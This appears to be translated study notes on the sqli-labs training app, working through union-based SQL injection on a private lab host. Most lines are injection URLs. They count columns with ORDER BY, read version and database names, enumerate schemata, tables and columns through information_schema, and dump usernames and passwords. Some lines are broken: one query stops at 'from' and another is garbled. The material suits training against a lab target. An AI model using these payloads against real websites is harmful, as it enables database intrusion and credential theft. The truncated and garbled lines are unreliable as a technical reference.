id title content time author
select * from news where id = 1;
select version();
select * from news where id = 1 order by 1; use order by to sort the number of columns and query the number of columns
select * from holder where id = 1 union select 1,2,3,4,version(); Use union connection to output two SQL queries, the number of columns must be the same
Actual combat: http://10.1.2.5:10631/sqli/Less-2/?id=1
First http://10.1.2.5:10631/sqli/Less-2/?id=1 is equivalent to select * from holder where id = 1;
http://10.1.2.5:10631/sqli/Less-2/?id=1 order by 1 to query the number of columns
Because the sorting page only displays the first piece of data, http://10.1.2.5:10631/sqli/Less-2/?id=0 union select 1,2,version() filters out the first piece of data and outputs the desired data--version number
group_concat() displays query to all columns
information_schema a library
schemata: save the name of all databases
tables: save the name of the table
columns: save the names of all fields
Query all library names http://10.1.2.5:10631/sqli/Less-2/?id=0 union select 1,2,group_concat(schema_name) from information_schema.schemata There is a column named schema_name from the information_schema library Extract all library names
Query all tables in the current database http://10.1.2.5:10631/sqli/Less-2/?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()
Query all column names in a table http://10.1.2.5:10631/sqli/Less-2/?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = "users"
Query the contents of the table http://10.1.2.5:10631/sqli/Less-2/?id=0 union select 1,group_concat(password),group_concat(username) from
http://10.1.2.5:10631/sqli/Less-1/?id=1' In the error report, '1'' LIMIT 0, 1 can be seen that id= is followed by other statements, so order by cannot be used directly. It should be like this http://10.1.2.5:10631/sqli/Less-1/?id=''LIMIT 01
http://10.1.2.5:10631/sqli/Less-4/?id=") union select 1,2,database() %23 Close all unclosed symbols when injecting